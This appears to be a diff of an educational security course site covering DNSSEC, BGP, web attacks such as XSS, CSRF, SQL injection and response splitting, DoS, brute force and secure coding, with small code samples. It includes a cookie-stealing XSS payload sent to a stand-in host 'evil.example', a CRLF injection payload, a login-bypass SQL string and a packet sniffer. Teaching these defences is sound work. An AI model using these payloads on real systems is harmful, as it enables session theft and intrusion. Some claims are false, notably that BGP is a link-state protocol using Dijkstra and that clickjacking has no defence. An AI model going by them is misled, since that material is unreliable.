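if dns.rdatatype.RRSIG not in rrsets:
    raise SystemExit("no RRSIG returned; the zone may be unsigned")

try:
    dns.dnssec.validate(rrsets[dns.rdatatype.DNSKEY],
                        rrsets[dns.rdatatype.RRSIG],
                        {zone: rrsets[dns.rdatatype.DNSKEY]})
    print("DNSKEY RRset signature verified")
except dns.dnssec.ValidationFailure:
    print("validation failed: the response may be spoofed")
```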
### BGP
- BGP stands for Border Gateway Protocol. It is a routing protocol that exchanges routing information among multiple Autonomous Systems (AS).
- An Autonomous System is a collection of routers or networks with the same network policy, usually under single administrative control.
- BGP tells routers which hop to use in order to reach the destination network.
- BGP is used for both communicating information among routers in an AS (interior) and between multiple ASes (exterior).
@ -29,11 +29,11 @@ the typical time to live (TTL) for cached entries is a couple of hours, thereby
## How BGP Works
- BGP is responsible for finding a path to a destination router, and the path it chooses should be the shortest and most reliable one.
- This decision is made through a protocol known as link state. With the link-state protocol, each router broadcasts to all other routers in the network the state of its links and IP subnets. Each router then receives information from the other routers and constructs a complete topology view of the entire network. The next-hop routing table is based on this topology view.
- The link-state protocol uses a famous algorithm in the field of computer science, Dijkstra's shortest path algorithm (a minimal sketch follows this list):
- We start from our router, considering the path cost to all our direct neighbours.
- The shortest path is then taken.
- We then re-look at all the neighbours we can reach and update our link-state table with the cost information. We then continue taking the shortest path until every router has been visited.
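A minimal sketch of Dijkstra's algorithm over a hypothetical four-router topology (router names and link costs are made up for illustration):

```
import heapq

# Dijkstra's shortest-path algorithm, as a link-state protocol runs it:
# start at the local router, repeatedly settle the cheapest unvisited
# node, and relax the costs of its links.
def dijkstra(graph: dict, source: str) -> dict:
    dist = {source: 0}
    heap = [(0, source)]
    visited = set()
    while heap:
        cost, node = heapq.heappop(heap)
        if node in visited:
            continue
        visited.add(node)
        for neighbour, weight in graph[node].items():
            new_cost = cost + weight
            if new_cost < dist.get(neighbour, float("inf")):
                dist[neighbour] = new_cost
                heapq.heappush(heap, (new_cost, neighbour))
    return dist

# Link costs between routers A-D (hypothetical topology).
topology = {
    "A": {"B": 1, "C": 4},
    "B": {"A": 1, "C": 2, "D": 5},
    "C": {"A": 4, "B": 2, "D": 1},
    "D": {"B": 5, "C": 1},
}
print(dijkstra(topology, "A"))  # {'A': 0, 'B': 1, 'C': 3, 'D': 4}
```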
## BGP Vulnerabilities
@ -41,34 +41,34 @@ the typical time to live (TTL) for cached entries is a couple of hours, thereby
- Injecting bogus route advertising information into the BGP-distributed routing database, whether maliciously or accidentally, can disrupt Internet backbone operations.
- Blackholing traffic:
- Blackhole route is a network route, i.e., routing table entry, that goes nowhere and packets matching the route prefix are dropped or ignored. Blackhole routes can only be detected by monitoring the lost traffic.
- Blackhole routes are the best defence against many common viral attacks, where traffic from infected machines to/from their command & control masters is dropped.
- Infamous BGP Injection attack on Youtube
- EX: In 2008, Pakistan decided to block YouTube by creating a BGP route that led into a black hole. Instead, this routing information got transmitted to a Hong Kong ISP and from there accidentally propagated to the rest of the world, meaning millions of users were routed into this black hole and therefore unable to access YouTube.
- Potentially, the greatest risk to BGP occurs in a denial of service attack in which a router is flooded with more packets than it can handle. Network overload and router resource exhaustion happen when the network begins carrying an excessive number of BGP messages, overloading the router's control processors, memory, and routing table, and reducing the bandwidth available for data traffic.
- Refer: <https://medium.com/bugbountywriteup/bgp-the-weak-link-in-the-internet-what-is-bgp-and-how-do-hackers-exploit-it-d899a68ba5bb>
- Route flapping is another type of attack. Route flapping refers to repetitive changes to the BGP routing table, often several times a minute. Withdrawing and re-advertising at a high rate can cause a serious problem for routers, since they propagate the announcements of routes. If these route flaps happen fast enough, e.g., 30 to 50 times per second, the router becomes overloaded, which eventually prevents convergence on valid routes. The potential impact for Internet users is a slowdown in message delivery, and in some cases, packets may not be delivered at all.
BGP Security
- Border Gateway Protocol Security recommends the use of BGP peer authentication, since it is one of the strongest mechanisms for preventing malicious activity.
- The authentication mechanisms are Internet Protocol Security (IPsec) or BGP MD5.
- Another method, known as prefix limits, can be used to avoid filling router tables. In this approach, routers are configured to disable or terminate a BGP peering session, and issue warning messages to administrators, when a neighbour sends more than a preset number of prefixes.
- The IETF is currently working on improvements in this space.
## Web-Based Attacks
### HTTP Response Splitting Attacks
- HTTP response splitting attacks may happen when the server script embeds user data in HTTP response headers without appropriate sanitization.
- This typically happens when the script embeds user data in the redirection URL of a redirection response (HTTP status code 3xx), or when the script embeds user data in a cookie value or name when the response sets a cookie.
- HTTP response splitting attacks can be used to perform web cache poisoning and cross-site scripting attacks.
- HTTP response splitting is the attacker's ability to send a single HTTP request that forces the web server to form an output stream, which is then interpreted by the target as two HTTP responses instead of one (sketched below).
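A sketch of the vulnerability and its fix; the function names and payload are made up for illustration:

```
# A server naively embeds a user-controlled value in the Location header.
def build_redirect(location: str) -> bytes:
    # VULNERABLE: `location` is not sanitized before header embedding.
    return f"HTTP/1.1 302 Found\r\nLocation: {location}\r\n\r\n".encode()

# The attacker smuggles CRLF sequences so the byte stream parses as TWO
# responses; the second one is entirely attacker-controlled.
payload = ("http://example.com/\r\n"
           "Content-Length: 0\r\n"
           "\r\n"
           "HTTP/1.1 200 OK\r\n"
           "Content-Length: 25\r\n"
           "\r\n"
           "<script>alert(1)</script>")
print(build_redirect(payload).decode())

def build_redirect_safe(location: str) -> bytes:
    # FIX: reject (or strip) CR/LF before embedding user data in headers.
    if "\r" in location or "\n" in location:
        raise ValueError("CR/LF not allowed in header values")
    return f"HTTP/1.1 302 Found\r\nLocation: {location}\r\n\r\n".encode()
```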
### Cross-Site Request Forgery (CSRF or XSRF)
- A Cross-Site Request Forgery attack tricks the victims browser into issuing a command to a vulnerable web application.
- The vulnerability is caused by browsers automatically including user authentication data (session ID, IP address, Windows domain credentials, etc.) with each request.
- Attackers typically use CSRF to initiate transactions such as transfer funds, login/logout user, close account, access sensitive data, and change account details.
- The vulnerability is caused by web browsers that automatically include credentials with each request, even for requests caused by a form, script, or image on another site. CSRF can also be dynamically constructed as part of a payload for a cross-site scripting attack.
- All sites relying on automatic credentials are vulnerable. Popular browsers cannot prevent cross-site request forgery. Logging out of high-value sites as soon as possible can mitigate CSRF risk. It is recommended that a high-value website must require a client to manually provide authentication data in the same HTTP request used to perform any operation with security implications. Limiting the lifetime of session cookies can also reduce the chance of being used by other malicious sites.
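One widely used mitigation along these lines is the synchronizer token: the server issues a random token bound to the session, and a state-changing request is honoured only if it echoes the token back. A forged cross-site request cannot know the token, so it fails even though cookies are sent automatically. A minimal sketch, with a plain dict standing in for real session middleware:

```
import hmac
import secrets

session_store: dict[str, str] = {}   # session_id -> csrf_token

def issue_token(session_id: str) -> str:
    token = secrets.token_urlsafe(32)
    session_store[session_id] = token
    return token   # embed in a hidden form field, not in a cookie

def verify_token(session_id: str, submitted: str) -> bool:
    expected = session_store.get(session_id, "")
    # Constant-time comparison avoids timing side channels.
    return hmac.compare_digest(expected, submitted)

sid = "session-abc"
tok = issue_token(sid)
assert verify_token(sid, tok)              # legitimate form submission
assert not verify_token(sid, "forged")     # cross-site forgery fails
```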
@ -77,20 +77,20 @@ BGP Security
### Cross-Site Scripting (XSS) Attacks
- Cross-Site Scripting occurs when dynamically generated web pages display user input, such as login information, that is not properly validated, allowing an attacker to embed malicious scripts into the generated page and then execute the script on the machine of any user that views the site.
- If successful, Cross-Site Scripting vulnerabilities can be exploited to manipulate or steal cookies, create requests that can be mistaken for those of a valid user, compromise confidential information, or execute malicious code on end-user systems.
- Cross-Site Scripting (XSS or CSS) attacks involve the execution of malicious scripts on the victims browser. The victim is simply a users host and not the server. XSS results from a failure to validate user input by a web-based application.
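Output encoding is the usual first line of defence: escape user input before embedding it in generated HTML, so a script payload renders as inert text. A minimal sketch using Python's standard `html` module:

```
import html

# Escape user input before it is embedded in a generated page, so a
# script payload renders as text instead of executing in the browser.
def render_greeting(username: str) -> str:
    return f"<p>Welcome, {html.escape(username)}!</p>"

payload = '<script>document.location="http://evil.example/?c="+document.cookie</script>'
print(render_greeting(payload))
# <p>Welcome, &lt;script&gt;...&lt;/script&gt;!</p>  -- harmless text
```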
### Document Object Model (DOM) XSS Attacks
- Document Object Model (DOM) based XSS does not require the web server to receive the XSS payload for a successful attack. The attacker abuses the runtime by embedding their data on the client side. An attacker can force the client (browser) to render the page with parts of the DOM controlled by the attacker.
- When the page is rendered and the data is processed by the page, typically by a client-side HTML-embedded script such as JavaScript, the page's code may insecurely embed the data in the page itself, thus delivering the cross-site scripting payload. Several DOM objects can serve as an attack vehicle for delivering malicious script to the victim's browser.
### Clickjacking
- The technique works by hiding malicious link/scripts under the cover of the content of a legitimate site.
- Buttons on a website actually contain invisible links, placed there by the attacker. So, an individual who clicks on an object they can visually see is actually being duped into visiting a malicious page or executing a malicious script.
- When mouseover is used together with clickjacking, the outcome is devastating. Since Memorial Day 2010, Facebook users have been hit by a clickjacking attack that tricks people into "liking" a particular Facebook page, enabling the attack to spread.
- There is not yet an effective defence against clickjacking, and disabling JavaScript is the only viable method.
## Database Attacks & Defenses
@ -107,7 +107,7 @@ Here the username & password is the input provided by the user. Suppose an attac
SELECT USERNAME,PASSWORD from USERS where USERNAME='' OR '1'='1' AND PASSWORD='' OR '1'='1';
This query results in a true statement & the user gets logged in. This example depicts the most basic type of SQL injection
```
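The standard defence against the query above is parameterization, which makes the driver treat user input purely as data. A runnable sketch using Python's built-in `sqlite3` (table and credentials are made up for illustration):

```
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

username = "' OR '1'='1"     # classic injection string
password = "' OR '1'='1"

# VULNERABLE: string concatenation lets the input rewrite the query.
unsafe = (f"SELECT username, password FROM users "
          f"WHERE username='{username}' AND password='{password}'")
print(conn.execute(unsafe).fetchone())   # ('alice', 's3cret') -- bypassed!

# SAFE: a parameterized query treats the input purely as data.
safe_row = conn.execute(
    "SELECT username, password FROM users WHERE username=? AND password=?",
    (username, password),
).fetchone()
print(safe_row)                          # None -- no such user
```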
@ -130,13 +130,13 @@ In spite of the most aggressive steps to protect computers from attacks, attacke
### Denial of Service Attacks
- Denial of service (DoS) attacks result in downtime or the inability of a user to access a system. DoS attacks impact the availability tenet of information systems security. A DoS attack is a coordinated attempt to deny service by occupying a computer with large amounts of unnecessary work. This excessive activity makes the system unavailable to perform legitimate operations
- Two common types of DoS attacks are as follows:
- Logic attacks—Logic attacks use software flaws to crash or seriously hinder the performance of remote servers. You can prevent many of these attacks by installing the latest patches to keep your software up to date.
- Flooding attacks—Flooding attacks overwhelm the victim computers CPU, memory, or network resources by sending large numbers of useless requests to the machine.
- Most DoS attacks target weaknesses in the overall system architecture rather than a software bug or security flaw
- One popular technique for launching a packet flood is a SYN flood.
- One of the best defences against DoS attacks is to use intrusion prevention system (IPS) software or devices to detect and stop the attack.
### Distributed Denial of Service Attacks
@ -160,14 +160,14 @@ In spite of the most aggressive steps to protect computers from attacks, attacke
### Birthday Attack
- Once an attacker compromises a hashed password file, a birthday attack is performed. A birthday attack is a type of cryptographic attack that is used to make a brute-force attack on one-way hashes easier. It is a mathematical exploit that is based on the birthday problem in probability theory.
- Further Reading:
- <https://www.sciencedirect.com/topics/computer-science/birthday-attack>
- <https://www.internetsecurity.tips/birthday-attack/>
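The birthday bound is easy to demonstrate: with an n-bit digest, a collision is expected after roughly 2^(n/2) random inputs rather than 2^n. The sketch below truncates SHA-256 to 32 bits, so a collision typically appears after only ~80,000 attempts instead of ~4 billion:

```
import hashlib
import os

# Truncate SHA-256 to 4 bytes to get a toy 32-bit hash function.
def truncated_hash(data: bytes) -> bytes:
    return hashlib.sha256(data).digest()[:4]

seen: dict[bytes, bytes] = {}
attempts = 0
while True:
    attempts += 1
    msg = os.urandom(16)
    digest = truncated_hash(msg)
    if digest in seen and seen[digest] != msg:
        print(f"collision after {attempts} attempts")  # typically ~80k
        break
    seen[digest] = msg
```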
### Brute-Force Password Attacks
- In a brute-force password attack, the attacker tries different passwords on a system until one of them is successful. Usually, the attacker employs a software program to try all possible combinations of a likely password, user ID, or security code until it locates a match. This occurs rapidly and in sequence. This type of attack is called a brute-force password attack because the attacker simply hammers away at the code. There is no skill or stealth involved—just brute force that eventually breaks the code.
- Further Reading:
- <https://owasp.org/www-community/attacks/Brute_force_attack>
- <https://owasp.org/www-community/controls/Blocking_Brute_Force_Attacks>
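A toy brute-force sketch: every four-character lowercase password is tried in sequence until one hashes to the stolen value. The keyspace here is only 26^4 (about 457k) guesses, which is exactly why password length and character set matter:

```
import hashlib
import itertools
import string

# Hash of the unknown password, as recovered from a stolen file.
stolen_hash = hashlib.sha256(b"zzyx").hexdigest()

# Hammer through the whole keyspace in sequence.
for candidate in itertools.product(string.ascii_lowercase, repeat=4):
    guess = "".join(candidate)
    if hashlib.sha256(guess.encode()).hexdigest() == stolen_hash:
        print(f"cracked: {guess}")
        break
```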
@ -187,7 +187,7 @@ https://capec.mitre.org/data/definitions/16.html
### Man-in-the-Middle Attacks
- A man-in-the-middle attack takes advantage of the multihop process used by many types of networks. In this type of attack, an attacker intercepts messages between two parties before transferring them on to their intended destination.
- Web spoofing is a type of man-in-the-middle attack in which the user believes a secure session exists with a particular web server. In reality, the secure connection exists only with the attacker, not the web server. The attacker then establishes a secure connection with the web server, acting as an invisible go-between, and passes traffic between the user and the web server. In this way, the attacker can trick the user into supplying passwords, credit card information, and other private data.
- Further Reading:
- <https://owasp.org/www-community/attacks/Man-in-the-middle_attack>
@ -199,7 +199,7 @@ https://capec.mitre.org/data/definitions/16.html
### Eavesdropping
- Eavesdropping, or sniffing, occurs when a host sets its network interface to promiscuous mode and copies packets that pass by for later analysis. Promiscuous mode enables a network device to intercept and read each network packet (given certain conditions), even if the packet's address doesn't match the network device. It is possible to attach hardware and software to monitor and analyze all packets on that segment of the transmission media without alerting any other users. Candidates for eavesdropping include satellite, wireless, mobile, and other transmission methods (a minimal sniffer sketch follows).
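A minimal sniffer sketch (Linux-only, requires root): an `AF_PACKET` raw socket bound to `ETH_P_ALL` receives a copy of every frame on the interface, which is exactly the capability an eavesdropper on a shared segment exploits:

```
import socket

ETH_P_ALL = 0x0003   # capture frames of every protocol

sniffer = socket.socket(socket.AF_PACKET, socket.SOCK_RAW,
                        socket.ntohs(ETH_P_ALL))
for _ in range(5):                 # capture five frames, then stop
    frame, meta = sniffer.recvfrom(65535)
    iface, proto, pkt_type, hatype, src_mac = meta
    print(f"{iface}: {len(frame)} bytes, src MAC {src_mac.hex(':')}")
```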
### Social Engineering

View File

@ -17,7 +17,7 @@ The first and most important step in reducing security and reliability issues is
Try to keep your code clean and simple.
### Avoid Multi-Level Nesting
- Multilevel nesting is a common anti-pattern that can lead to simple mistakes. If the error is in the most common code path, it will likely be captured by the unit tests. However, unit tests don't always check error-handling paths in multilevel nested code. The error might result in decreased reliability (for example, if the service crashes when it mishandles an error) or a security vulnerability (like a mishandled authorization check error). A sketch of the flattening refactor follows.
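In the sketch below, guard clauses replace the nesting so every error path returns early and is trivially unit-testable; the request shape and helper functions are made up for illustration:

```
def fetch_user(request):            # hypothetical helpers
    return request.get("user")

def is_authorized(user, request):
    return user == "admin"

def process(request):
    return "200 OK"

# Deeply nested: the error paths are buried and easy to miss in tests.
def handle_nested(request):
    if request is not None:
        user = fetch_user(request)
        if user is not None:
            if is_authorized(user, request):
                return process(request)
            return "403 Forbidden"
        return "401 Unauthorized"
    return "400 Bad Request"

# Flattened with guard clauses: each failure is handled up front.
def handle_flat(request):
    if request is None:
        return "400 Bad Request"
    user = fetch_user(request)
    if user is None:
        return "401 Unauthorized"
    if not is_authorized(user, request):
        return "403 Forbidden"
    return process(request)

assert handle_flat({"user": "admin"}) == handle_nested({"user": "admin"})
assert handle_flat(None) == "400 Bad Request"
```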
@ -42,7 +42,7 @@ The first and most important step in reducing security and reliability issues is
### Fuzz Testing
- Fuzz testing is a technique that complements the previously mentioned testing techniques. Fuzzing involves using a fuzzing engine to generate a large number of candidate inputs that are then passed through a fuzz driver to the fuzz target. The fuzzer then analyzes how the system handles the input. Complex inputs handled by all kinds of software are popular targets for fuzzing - for example, file parsers, compression algorithms, network protocol implementations, and audio codecs (a toy fuzz loop is sketched below).
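A hand-rolled fuzz loop to make the idea concrete; real fuzz engines such as AFL or libFuzzer are coverage-guided, but the shape is the same. The target here is a toy parser with a planted bug on inputs nested deeper than three levels:

```
import random

# Fuzz target: a toy parser that crashes on deep nesting.
def parse(data: bytes) -> int:
    depth = 0
    for b in data:
        if b == ord("("):
            depth += 1
        elif b == ord(")"):
            depth -= 1
        if depth > 3:
            raise RuntimeError("nesting too deep (planted bug)")
    return depth

ALPHABET = b"()ab"   # a tiny input dictionary, as fuzzers often use

# Mutator: flip a few random bytes of the seed input.
def mutate(seed: bytes) -> bytes:
    data = bytearray(seed)
    for _ in range(random.randint(1, 4)):
        data[random.randrange(len(data))] = random.choice(ALPHABET)
    return bytes(data)

seed = b"((hello))((hello))"
for i in range(10_000):
    sample = mutate(seed)
    try:
        parse(sample)
    except RuntimeError as exc:
        print(f"crash on iteration {i}: {sample!r} -> {exc}")
        break
```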
### Integration Testing

View File

@ -0,0 +1 @@
div.md-content img { border: 4px solid #ddd; padding: 12px; }

View File

@ -5,6 +5,8 @@ theme:
logo: img/sos.png
favicon: img/favicon.ico
custom_dir: overrides
extra_css:
- stylesheets/custom.css
nav:
- Home: index.md
- Fundamentals Series:
@ -41,13 +43,13 @@ nav:
- Operational Concepts: databases_sql/operations.md
- Lab: databases_sql/lab.md
- Further Reading: databases_sql/reading.md
- NoSQL:
- Introduction: databases_nosql/intro.md
- Key Concepts: databases_nosql/key_concepts.md
- Conclusion: databases_nosql/further_reading.md
- Big Data:
- Introduction: big_data/intro.md
- Evolution and Architecture of Hadoop: big_data/evolution.md
- Conclusion: big_data/tasks.md
- Systems Design:
- Introduction: systems_design/intro.md

2
requirements.txt Normal file
View File

@ -0,0 +1,2 @@
mkdocs
mkdocs-material